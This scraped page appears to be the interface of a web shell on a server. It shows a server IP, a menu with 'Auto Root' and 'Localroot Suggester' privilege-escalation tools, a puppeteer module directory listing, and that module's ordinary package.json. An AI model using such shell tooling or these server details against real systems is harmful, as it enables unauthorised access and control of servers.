Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.221.72.117
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
node_modules /
puppeteer /
Delete
Unzip
Name
Size
Permission
Date
Action
.local-chromium
[ DIR ]
drwxr-xr-x
2022-01-26 16:52
lib
[ DIR ]
drwxr-xr-x
2022-01-26 16:52
CHANGELOG.md
13.63
KB
-rw-r--r--
1985-10-26 08:15
LICENSE
11.08
KB
-rw-r--r--
1985-10-26 08:15
README.md
21.66
KB
-rw-r--r--
1985-10-26 08:15
cjs-entry-core.js
1.26
KB
-rw-r--r--
1985-10-26 08:15
cjs-entry.js
1.24
KB
-rw-r--r--
1985-10-26 08:15
install.js
2.73
KB
-rw-r--r--
1985-10-26 08:15
package.json
5.34
KB
-rw-r--r--
2022-01-26 16:52
typescript-if-required.js
2
KB
-rw-r--r--
1985-10-26 08:15
Save
Rename
{ "_from": "puppeteer@^9.1.1", "_id": "puppeteer@9.1.1", "_inBundle": false, "_integrity": "sha512-W+nOulP2tYd/ZG99WuZC/I5ljjQQ7EUw/jQGcIb9eu8mDlZxNY2SgcJXTLG9h5gRvqA3uJOe4hZXYsd3EqioMw==", "_location": "/puppeteer", "_phantomChildren": {}, "_requested": { "type": "range", "registry": true, "raw": "puppeteer@^9.1.1", "name": "puppeteer", "escapedName": "puppeteer", "rawSpec": "^9.1.1", "saveSpec": null, "fetchSpec": "^9.1.1" }, "_requiredBy": [ "#USER", "/" ], "_resolved": "https://registry.npmjs.org/puppeteer/-/puppeteer-9.1.1.tgz", "_shasum": "f74b7facf86887efd6c6b9fabb7baae6fdce012c", "_spec": "puppeteer@^9.1.1", "_where": "/home/www/unp", "author": { "name": "The Chromium Authors" }, "bugs": { "url": "https://github.com/puppeteer/puppeteer/issues" }, "bundleDependencies": false, "dependencies": { "debug": "^4.1.0", "devtools-protocol": "0.0.869402", "extract-zip": "^2.0.0", "https-proxy-agent": "^5.0.0", "node-fetch": "^2.6.1", "pkg-dir": "^4.2.0", "progress": "^2.0.1", "proxy-from-env": "^1.1.0", "rimraf": "^3.0.2", "tar-fs": "^2.0.0", "unbzip2-stream": "^1.3.3", "ws": "^7.2.3" }, "deprecated": false, "description": "A high-level API to control headless Chrome over the DevTools Protocol", "devDependencies": { "@commitlint/cli": "^11.0.0", "@commitlint/config-conventional": "^11.0.0", "@microsoft/api-documenter": "^7.12.7", "@microsoft/api-extractor": "^7.13.1", "@types/debug": "0.0.31", "@types/mime": "^2.0.0", "@types/mocha": "^7.0.2", "@types/node": "^14.0.13", "@types/proxy-from-env": "^1.0.1", "@types/rimraf": "^2.0.2", "@types/sinon": "^9.0.4", "@types/tar-fs": "^1.16.2", "@types/ws": "^7.2.4", "@typescript-eslint/eslint-plugin": "^4.4.0", "@typescript-eslint/parser": "^4.4.0", "@web/test-runner": "^0.12.15", "commonmark": "^0.28.1", "cross-env": "^7.0.2", "eslint": "^7.10.0", "eslint-config-prettier": "^6.12.0", "eslint-plugin-import": "^2.22.0", "eslint-plugin-mocha": "^8.0.0", "eslint-plugin-prettier": "^3.1.4", "eslint-plugin-unicorn": "^22.0.0", "esprima": "^4.0.0", "expect": "^25.2.7", "husky": "^4.3.0", "jpeg-js": "^0.3.7", "mime": "^2.0.3", "minimist": "^1.2.0", "mocha": "^8.2.0", "ncp": "^2.0.0", "pixelmatch": "^4.0.2", "pngjs": "^5.0.0", "prettier": "^2.1.2", "sinon": "^9.0.2", "source-map-support": "^0.5.19", "standard-version": "^9.0.0", "text-diff": "^1.0.1", "ts-node": "^9.0.0", "typescript": "^4.1.5" }, "engines": { "node": ">=10.18.1" }, "files": [ "lib/types.d.ts", "lib/**/*.d.ts", "lib/**/*.d.ts.map", "lib/**/*.js", "lib/**/*.js.map", "install.js", "typescript-if-required.js", "cjs-entry.js", "cjs-entry-core.js" ], "homepage": "https://github.com/puppeteer/puppeteer#readme", "husky": { "hooks": { "commit-msg": "commitlint --env HUSKY_GIT_PARAMS" } }, "license": "Apache-2.0", "main": "./cjs-entry.js", "name": "puppeteer", "repository": { "type": "git", "url": "git+https://github.com/puppeteer/puppeteer.git" }, "scripts": { "apply-next-version": "node utils/apply_next_version.js", "assert-unit-coverage": "cross-env COVERAGE=1 mocha --config mocha-config/coverage-tests.js", "build": "npm run tsc && npm run generate-d-ts", "clean-lib": "rimraf lib", "commitlint": "commitlint --from=HEAD~1", "dev-install": "npm run tsc && node install.js", "doc": "node utils/doclint/cli.js", "ensure-correct-devtools-protocol-revision": "ts-node -s scripts/ensure-correct-devtools-protocol-package", "eslint": "([ \"$CI\" = true ] && eslint --ext js --ext ts --quiet -f codeframe . || eslint --ext js --ext ts .)", "eslint-fix": "eslint --ext js --ext ts --fix .", "funit": "cross-env PUPPETEER_PRODUCT=firefox npm run unit", "generate-d-ts": "api-extractor run --local --verbose", "generate-docs": "npm run generate-d-ts && api-documenter markdown -i temp -o new-docs", "install": "node install.js", "lint": "npm run eslint && npm run build && npm run doc && npm run commitlint && npm run markdownlint", "markdownlint": "prettier --check **/README.md docs/api.md docs/troubleshooting.md", "markdownlint-fix": "prettier --write **/README.md docs/api.md docs/troubleshooting.md", "prepare": "node typescript-if-required.js", "prepublishOnly": "npm run build", "release": "node utils/remove_version_suffix.js && standard-version --commit-all", "test": "npm run tsc && npm run lint --silent && npm run unit-with-coverage && npm run test-browser", "test-browser": "wtr", "test-browser-watch": "wtr --watch", "test-install": "scripts/test-install.sh", "test-types-file": "ts-node -s scripts/test-ts-definition-files.ts", "tsc": "npm run clean-lib && tsc --version && npm run tsc-cjs && npm run tsc-esm", "tsc-cjs": "tsc -b src/tsconfig.cjs.json", "tsc-esm": "tsc -b src/tsconfig.esm.json", "unit": "npm run tsc-cjs && mocha --config mocha-config/puppeteer-unit-tests.js", "unit-debug": "npm run tsc-cjs && mocha --inspect-brk --config mocha-config/puppeteer-unit-tests.js", "unit-with-coverage": "cross-env COVERAGE=1 npm run unit" }, "types": "lib/types.d.ts", "version": "9.1.1" }